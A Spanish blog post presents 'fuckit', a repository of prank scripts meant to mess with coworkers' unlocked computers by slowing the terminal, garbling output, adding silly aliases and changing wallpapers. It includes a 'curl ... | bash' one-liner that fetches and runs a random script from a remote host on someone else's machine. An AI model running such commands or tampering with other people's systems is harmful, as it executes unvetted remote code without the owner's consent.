+++
title = "Como joder ordenadores sin vigilancia"
author = ["drymer"]
date = 2018-11-05T20:59:00+01:00
tags = ["badusb"]
draft = false
+++

Les desarrolladores tienen la excusa de "está compilando" para perder el tiempo en chorradas, les sysadmin ahora tenemos el "el pipeline se está ejecutando". Por ello, a veces me encuentro con tiempos muertos y me da por pensar como joder a les compañeros de trabajo que se dejan el ordenador desbloqueado.

Cuando me encontraba uno lo que hacia era ponerle un par de alias tontos, en el momento no daba la cabeza para mucho más. Así que en los tiempos muertos, como ejercicio, empecé a apuntar las cosas que se me ocurrían, luego me puse a buscar y fuí comentando con un compañero. Y así se ha creado el proyecto `fuckit`.

Este [repositorio git](https://git.daemons.it/drymer/fuckit) acepta sugerencias y PR. Los scripts que hay en el momento:

-   Añaden tiempo de arranque a la terminal
-   Destrozan el stdout con `/etc/urandom`
-   Meten alias absurdos
-   Cambian el fondo de pantalla
-   ...

Algunos son sutiles y otros son una patada en la cara.

Este repositorio, además, se puede usar en el sub-dominio [fuckit.daemons.it](http://fuckit.daemons.it). Este sub-dominio por defecto sirve el script `shuffle.sh`. Este script lo que hace es lanzar una petición a [fuckit.daemons.it/all/](http://fuckit.daemons.it/all), escoger un script aleatoriamente y ejecutarlo.

La forma más simple de usarlo es la siguiente:

```bash
curl fuckit.daemons.it | bash
```

Y se pueden listar todos los scripts así:

```bash
curl fuckit.daemons.it/all/
```

Y ale, a abusar.
